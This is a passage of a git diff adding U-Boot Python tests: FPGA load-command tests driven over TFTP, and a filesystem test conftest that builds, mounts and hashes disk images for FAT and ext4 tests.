'bitstream_loadb': 'compress.bit', + 'bitstream_loadb_size': 1832086, + 'bitstream_loadbp': 'compress_pr.bit', + 'bitstream_loadbp_size': 423491, + 'mkimage_legacy': 'download.ub', + 'mkimage_legacy_size': 13321468, + 'mkimage_legacy_gz': 'download.gz.ub', + 'mkimage_legacy_gz_size': 53632, + 'mkimage_fit': 'download-fit.ub', + 'mkimage_fit_size': 13322784, + 'loadfs': 'mmc 0 compress.bin', + 'loadfs_size': 1831960, + 'loadfs_block_size': 0x10000, +} +""" + +import test_net + +def check_dev(u_boot_console): + f = u_boot_console.config.env.get('env__fpga_under_test', None) + if not f: + pytest.skip('No FPGA to test') + + dev = f.get('dev', -1) + if dev < 0: + pytest.fail('No dev specified via env__fpga_under_test') + + return dev, f + +def load_file_from_var(u_boot_console, name): + dev, f = check_dev(u_boot_console) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + test_net.test_net_dhcp(u_boot_console) + test_net.test_net_setup_static(u_boot_console) + bit = f['%s' % (name)] + bit_size = f['%s_size' % (name)] + + expected_tftp = 'Bytes transferred = %d' % bit_size + output = u_boot_console.run_command('tftpboot %x %s' % (addr, bit)) + assert expected_tftp in output + + return f, dev, addr, bit, bit_size + +###### FPGA FAIL test ###### +expected_usage = 'fpga - loadable FPGA image support' + +@pytest.mark.xfail +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_fail(u_boot_console): + # Test non valid fpga subcommand + expected = 'fpga: non existing command' + output = u_boot_console.run_command('fpga broken 0') + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_help(u_boot_console): + # Just show help + output = u_boot_console.run_command('fpga') + assert expected_usage in output + + +###### FPGA DUMP tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_dump(u_boot_console): + pytest.skip('Not implemented now') + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_dump_variable(u_boot_console): + # Same as above but via "fpga" variable + pytest.skip('Not implemented now') + +###### FPGA INFO tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_fail(u_boot_console): + # Maybe this can be skipped completely + dev, f = check_dev(u_boot_console) + + # Multiple parameters to fpga info should fail + expected = 'fpga: more parameters passed' + output = u_boot_console.run_command('fpga info 0 0') + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_list(u_boot_console): + # Maybe this can be skipped completely + dev, f = check_dev(u_boot_console) + + # Code is design in a way that if fpga dev is not passed it should + # return list of all fpga devices in the system + u_boot_console.run_command('setenv fpga') + output = u_boot_console.run_command('fpga info') + assert expected_usage not in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info(u_boot_console): + dev, f = check_dev(u_boot_console) + + output = u_boot_console.run_command('fpga info %x' % (dev)) + assert expected_usage not in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_variable(u_boot_console): + dev, f = check_dev(u_boot_console) + + # + # fpga variable is storing device number which doesn't need to be passed + # + u_boot_console.run_command('setenv fpga %x' % (dev)) + + output = u_boot_console.run_command('fpga info') + # Variable cleanup + u_boot_console.run_command('setenv fpga') + assert expected_usage not in output + +###### FPGA LOAD tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_load_fail(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_load') + + for cmd in ['dump', 'load', 'loadb']: + # missing dev parameter + expected = 'fpga: incorrect parameters passed' + output = u_boot_console.run_command('fpga %s %x $filesize' % (cmd, addr)) + #assert expected in output + assert expected_usage in output + + # more parameters - 0 at the end + expected = 'fpga: more parameters passed' + output = u_boot_console.run_command('fpga %s %x %x $filesize 0' % (cmd, dev, addr)) + #assert expected in output + assert expected_usage in output + + # 0 address + expected = 'fpga: zero fpga_data address' + output = u_boot_console.run_command('fpga %s %x 0 $filesize' % (cmd, dev)) + #assert expected in output + assert expected_usage in output + + # 0 filesize + expected = 'fpga: zero size' + output = u_boot_console.run_command('fpga %s %x %x 0' % (cmd, dev, addr)) + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_load(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_load') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga load %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadp') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadp(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_load') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga load %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + + # And load also partial bistream + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_loadp') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadp %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadb(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_loadb') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadb %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadbp') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadbp(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_loadb') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadb %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + + # And load also partial bistream in bit format + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_loadbp') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadbp %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +###### FPGA LOADMK tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +def test_fpga_loadmk_fail(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy') + + u_boot_console.run_command('imi %x' % (addr)) + + # load image but pass incorrect address to show error message + expected = 'Unknown image type' + output = u_boot_console.run_command('fpga loadmk %x %x' % (dev, addr + 0x10)) + assert expected in output + + # Pass more parameters then command expects - 0 at the end + output = u_boot_console.run_command('fpga loadmk %x %x 0' % (dev, addr)) + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +def test_fpga_loadmk_legacy(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy') + + u_boot_console.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x %x && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.xfail +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +def test_fpga_loadmk_legacy_variable_fpga(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy') + + u_boot_console.run_command('imi %x' % (addr)) + + u_boot_console.run_command('setenv fpga %x' % (dev)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x && echo %s' % (addr, expected_text)) + u_boot_console.run_command('setenv fpga') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +def test_fpga_loadmk_legacy_variable_fpgadata(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy') + + u_boot_console.run_command('imi %x' % (addr)) + + u_boot_console.run_command('setenv fpgadata %x' % (addr)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x && echo %s' % (dev, expected_text)) + u_boot_console.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +def test_fpga_loadmk_legacy_variable(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy') + + u_boot_console.run_command('imi %x' % (addr)) + + u_boot_console.run_command('setenv fpga %x' % (dev)) + u_boot_console.run_command('setenv fpgadata %x' % (addr)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk && echo %s' % (expected_text)) + u_boot_console.run_command('setenv fpga') + u_boot_console.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +@pytest.mark.buildconfigspec('gzip') +def test_fpga_loadmk_legacy_gz(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy_gz') + + u_boot_console.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x %x && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_external(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_fit_external') + + u_boot_console.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x %x:fpga && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_fit') + + u_boot_console.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x %x:fpga && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable_fpga(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_fit') + + u_boot_console.run_command('imi %x' % (addr)) + # FIXME this should fail - broken support in past + u_boot_console.run_command('setenv fpga %x' % (dev)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x:fpga && echo %s' % (addr, expected_text)) + u_boot_console.run_command('setenv fpga') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable_fpgadata(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_fit') + + u_boot_console.run_command('imi %x' % (addr)) + # FIXME this should fail - broken support in past + u_boot_console.run_command('setenv fpgadata %x:fpga' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x && echo %s' % (dev, expected_text)) + u_boot_console.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_fit') + + u_boot_console.run_command('imi %x' % (addr)) + + u_boot_console.run_command('setenv fpga %x' % (dev)) + u_boot_console.run_command('setenv fpgadata %x:fpga' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk && echo %s' % (expected_text)) + u_boot_console.run_command('setenv fpga') + u_boot_console.run_command('setenv fpgadata') + assert expected_text in output + +###### FPGA LOAD tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_loadfs_fail(u_boot_console): + dev, f = check_dev(u_boot_console) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + bit = f['loadfs'] + bit_size = f['loadfs_size'] + block_size = f['loadfs_block_size'] + + # less params - dev number removed + expected = 'fpga: incorrect parameters passed' + output = u_boot_console.run_command('fpga loadfs %x %x %x %s' % (addr, bit_size, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # one more param - 0 at the end + # This is the longest command that's why there is no message from cmd/fpga.c + output = u_boot_console.run_command('fpga loadfs %x %x %x %x %s 0' % (dev, addr, bit_size, block_size, bit)) + assert expected_usage in output + + # zero address 0 + expected = 'fpga: zero fpga_data address' + output = u_boot_console.run_command('fpga loadfs %x %x %x %x %s' % (dev, 0, bit_size, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # bit_size 0 + expected = 'fpga: zero size' + output = u_boot_console.run_command('fpga loadfs %x %x %x %x %s' % (dev, addr, 0, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # block size 0 + # FIXME this should pass but it failing too + output = u_boot_console.run_command('fpga loadfs %x %x %x %x %s' % (dev, addr, bit_size, 0, bit)) + assert expected_usage in output + + # non existing bitstream name + expected = 'Unable to read file noname' + output = u_boot_console.run_command('fpga loadfs %x %x %x %x mmc 0 noname' % (dev, addr, bit_size, block_size)) + assert expected in output + assert expected_usage in output + + # -1 dev number + expected = 'fpga_fsload: Invalid device number -1' + output = u_boot_console.run_command('fpga loadfs %d %x %x %x mmc 0 noname' % (-1, addr, bit_size, block_size)) + assert expected in output + assert expected_usage in output + + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadfs(u_boot_console): + dev, f = check_dev(u_boot_console) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + bit = f['loadfs'] + bit_size = f['loadfs_size'] + block_size = f['loadfs_block_size'] + + # This should be done better + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadfs %x %x %x %x %s && echo %s' % (dev, addr, bit_size, block_size, bit, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_load_secure') +@pytest.mark.buildconfigspec('cmd_net') +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('net') +def test_fpga_secure_bit_auth(u_boot_console): + + test_net.test_net_dhcp(u_boot_console) + test_net.test_net_setup_static(u_boot_console) + + f = u_boot_console.config.env.get('env__fpga_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + expected_zynqmpsecure = 'Bitstream successfully loaded' + output = u_boot_console.run_command('fpga loads 0 %x $filesize 0 2' % (addr)) + assert expected_zynqmpsecure in output + + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_load_secure') +@pytest.mark.buildconfigspec('cmd_net') +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('net') +def test_fpga_secure_bit_img_auth_kup(u_boot_console): + + test_net.test_net_dhcp(u_boot_console) + test_net.test_net_setup_static(u_boot_console) + + f = u_boot_console.config.env.get('env__fpga_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + keyaddr = f.get('keyaddr', None) + if not keyaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + expected_tftp = 'Bytes transferred = ' + keyfn = f['keyfn'] + output = u_boot_console.run_command('tftpboot %x %s' % (keyaddr, keyfn)) + assert expected_tftp in output + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + expected_tftp = 'Bytes transferred = ' + fn = f['enckupfn'] + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + expected_zynqmpsecure = 'Bitstream successfully loaded' + output = u_boot_console.run_command('fpga loads 0 %x $filesize 0 1 %x' % (addr, keyaddr)) + assert expected_zynqmpsecure in output diff --git a/test/py/tests/test_fs/conftest.py b/test/py/tests/test_fs/conftest.py new file mode 100644 index 00000000000..fca54488374 --- /dev/null +++ b/test/py/tests/test_fs/conftest.py @@ -0,0 +1,674 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> + +import os +import os.path +import pytest +import re +from subprocess import call, check_call, check_output, CalledProcessError +from fstest_defs import * +import u_boot_utils as util +# pylint: disable=E0611 +from tests import fs_helper + +supported_fs_basic = ['fat16', 'fat32', 'ext4'] +supported_fs_ext = ['fat12', 'fat16', 'fat32'] +supported_fs_fat = ['fat12', 'fat16'] +supported_fs_mkdir = ['fat12', 'fat16', 'fat32'] +supported_fs_unlink = ['fat12', 'fat16', 'fat32'] +supported_fs_symlink = ['ext4'] + +# +# Filesystem test specific setup +# +def pytest_addoption(parser): + """Enable --fs-type option. + + See pytest_configure() about how it works. + + Args: + parser: Pytest command-line parser. + + Returns: + Nothing. + """ + parser.addoption('--fs-type', action='append', default=None, + help='Targeting Filesystem Types') + +def pytest_configure(config): + """Restrict a file system(s) to be tested. + + A file system explicitly named with --fs-type option is selected + if it belongs to a default supported_fs_xxx list. + Multiple options can be specified. + + Args: + config: Pytest configuration. + + Returns: + Nothing. + """ + global supported_fs_basic + global supported_fs_ext + global supported_fs_fat + global supported_fs_mkdir + global supported_fs_unlink + global supported_fs_symlink + + def intersect(listA, listB): + return [x for x in listA if x in listB] + + supported_fs = config.getoption('fs_type') + if supported_fs: + print('*** FS TYPE modified: %s' % supported_fs) + supported_fs_basic = intersect(supported_fs, supported_fs_basic) + supported_fs_ext = intersect(supported_fs, supported_fs_ext) + supported_fs_fat = intersect(supported_fs, supported_fs_fat) + supported_fs_mkdir = intersect(supported_fs, supported_fs_mkdir) + supported_fs_unlink = intersect(supported_fs, supported_fs_unlink) + supported_fs_symlink = intersect(supported_fs, supported_fs_symlink) + +def pytest_generate_tests(metafunc): + """Parametrize fixtures, fs_obj_xxx + + Each fixture will be parametrized with a corresponding support_fs_xxx + list. + + Args: + metafunc: Pytest test function. + + Returns: + Nothing. + """ + if 'fs_obj_basic' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_basic', supported_fs_basic, + indirect=True, scope='module') + if 'fs_obj_ext' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_ext', supported_fs_ext, + indirect=True, scope='module') + if 'fs_obj_fat' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_fat', supported_fs_fat, + indirect=True, scope='module') + if 'fs_obj_mkdir' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_mkdir', supported_fs_mkdir, + indirect=True, scope='module') + if 'fs_obj_unlink' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_unlink', supported_fs_unlink, + indirect=True, scope='module') + if 'fs_obj_symlink' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_symlink', supported_fs_symlink, + indirect=True, scope='module') + +# +# Helper functions +# +def fstype_to_ubname(fs_type): + """Convert a file system type to an U-Boot specific string + + A generated string can be used as part of file system related commands + or a config name in u-boot. Currently fat16 and fat32 are handled + specifically. + + Args: + fs_type: File system type. + + Return: + A corresponding string for file system type. + """ + if re.match('fat', fs_type): + return 'fat' + else: + return fs_type + +def check_ubconfig(config, fs_type): + """Check whether a file system is enabled in u-boot configuration. + + This function is assumed to be called in a fixture function so that + the whole test cases will be skipped if a given file system is not + enabled. + + Args: + fs_type: File system type. + + Return: + Nothing. + """ + if not config.buildconfig.get('config_cmd_%s' % fs_type, None): + pytest.skip('.config feature "CMD_%s" not enabled' % fs_type.upper()) + if not config.buildconfig.get('config_%s_write' % fs_type, None): + pytest.skip('.config feature "%s_WRITE" not enabled' + % fs_type.upper()) + +# from test/py/conftest.py +def tool_is_in_path(tool): + """Check whether a given command is available on host. + + Args: + tool: Command name. + + Return: + True if available, False if not. + """ + for path in os.environ['PATH'].split(os.pathsep): + fn = os.path.join(path, tool) + if os.path.isfile(fn) and os.access(fn, os.X_OK): + return True + return False + +fuse_mounted = False + +def mount_fs(fs_type, device, mount_point): + """Mount a volume. + + Args: + fs_type: File system type. + device: Volume's file name. + mount_point: Mount point. + + Return: + Nothing. + """ + global fuse_mounted + + try: + check_call('guestmount --pid-file guestmount.pid -a %s -m /dev/sda %s' + % (device, mount_point), shell=True) + fuse_mounted = True + return + except CalledProcessError: + fuse_mounted = False + + mount_opt = 'loop,rw' + if re.match('fat', fs_type): + mount_opt += ',umask=0000' + + check_call('sudo mount -o %s %s %s' + % (mount_opt, device, mount_point), shell=True) + + # may not be effective for some file systems + check_call('sudo chmod a+rw %s' % mount_point, shell=True) + +def umount_fs(mount_point): + """Unmount a volume. + + Args: + mount_point: Mount point. + + Return: + Nothing. + """ + if fuse_mounted: + call('sync') + call('guestunmount %s' % mount_point, shell=True) + + try: + with open("guestmount.pid", "r") as pidfile: + pid = int(pidfile.read()) + util.waitpid(pid, kill=True) + os.remove("guestmount.pid") + + except FileNotFoundError: + pass + + else: + call('sudo umount %s' % mount_point, shell=True) + +# +# Fixture for basic fs test +# derived from test/fs/fs-test.sh +# +@pytest.fixture() +def fs_obj_basic(request, u_boot_config): + """Set up a file system to be used in basic fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for basic fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + mount_dir = u_boot_config.persistent_data_dir + '/mnt' + + small_file = mount_dir + '/' + SMALL_FILE + big_file = mount_dir + '/' + BIG_FILE + + try: + + # 3GiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0xc0000000, '3GB') + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + try: + check_call('mkdir -p %s' % mount_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Mount the image so we can populate it. + mount_fs(fs_type, fs_img, mount_dir) + except CalledProcessError as err: + pytest.skip('Mounting to folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a subdirectory. + check_call('mkdir %s/SUBDIR' % mount_dir, shell=True) + + # Create big file in this image. + # Note that we work only on the start 1MB, couple MBs in the 2GB range + # and the last 1 MB of the huge 2.5GB file. + # So, just put random values only in those areas. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % big_file, shell=True) + check_call('dd if=/dev/urandom of=%s bs=1M count=2 seek=2047' + % big_file, shell=True) + check_call('dd if=/dev/urandom of=%s bs=1M count=1 seek=2499' + % big_file, shell=True) + + # Create a small file in this image. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % small_file, shell=True) + + # Delete the small file copies which possibly are written as part of a + # previous test. + # check_call('rm -f "%s.w"' % MB1, shell=True) + # check_call('rm -f "%s.w2"' % MB1, shell=True) + + # Generate the md5sums of reads that we will test against small file + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % small_file, shell=True).decode() + md5val = [ out.split()[0] ] + + # Generate the md5sums of reads that we will test against big file + # One from beginning of file. + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from end of file. + out = check_output( + 'dd if=%s bs=1M skip=2499 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from the last 1MB chunk of 2GB + out = check_output( + 'dd if=%s bs=1M skip=2047 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from the start 1MB chunk from 2GB + out = check_output( + 'dd if=%s bs=1M skip=2048 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One 1MB chunk crossing the 2GB boundary + out = check_output( + 'dd if=%s bs=512K skip=4095 count=2 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + except CalledProcessError as err: + pytest.skip('Setup failed for filesystem: ' + fs_type + '. {}'.format(err)) + umount_fs(mount_dir) + return + else: + umount_fs(mount_dir) + yield [fs_ubtype, fs_img, md5val] + finally: + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for extended fs test +# +@pytest.fixture() +def fs_obj_ext(request, u_boot_config): + """Set up a file system to be used in extended fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for extended fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + mount_dir = u_boot_config.persistent_data_dir + '/mnt' + + min_file = mount_dir + '/' + MIN_FILE + tmp_file = mount_dir + '/tmpfile' + + try: + + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB') + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + try: + check_call('mkdir -p %s' % mount_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Mount the image so we can populate it. + mount_fs(fs_type, fs_img, mount_dir) + except CalledProcessError as err: + pytest.skip('Mounting to folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a test directory + check_call('mkdir %s/dir1' % mount_dir, shell=True) + + # Create a small file and calculate md5 + check_call('dd if=/dev/urandom of=%s bs=1K count=20' + % min_file, shell=True) + out = check_output( + 'dd if=%s bs=1K 2> /dev/null | md5sum' + % min_file, shell=True).decode() + md5val = [ out.split()[0] ] + + # Calculate md5sum of Test Case 4 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=5 count=20' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + # Calculate md5sum of Test Case 5 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=5 count=5' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + # Calculate md5sum of Test Case 7 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=20 count=20' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + check_call('rm %s' % tmp_file, shell=True) + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + umount_fs(mount_dir) + return + else: + umount_fs(mount_dir) + yield [fs_ubtype, fs_img, md5val] + finally: + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for mkdir test +# +@pytest.fixture() +def fs_obj_mkdir(request, u_boot_config): + """Set up a file system to be used in mkdir test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for mkdir test, i.e. a duplet of file system type and + volume file name. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + 